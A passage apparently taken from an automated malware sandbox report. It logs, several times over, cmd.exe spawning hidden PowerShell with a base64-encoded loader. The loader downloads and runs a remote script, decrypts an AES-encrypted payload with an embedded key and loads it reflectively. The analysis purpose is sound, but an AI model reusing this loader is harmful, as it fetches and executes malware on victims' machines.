To6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRy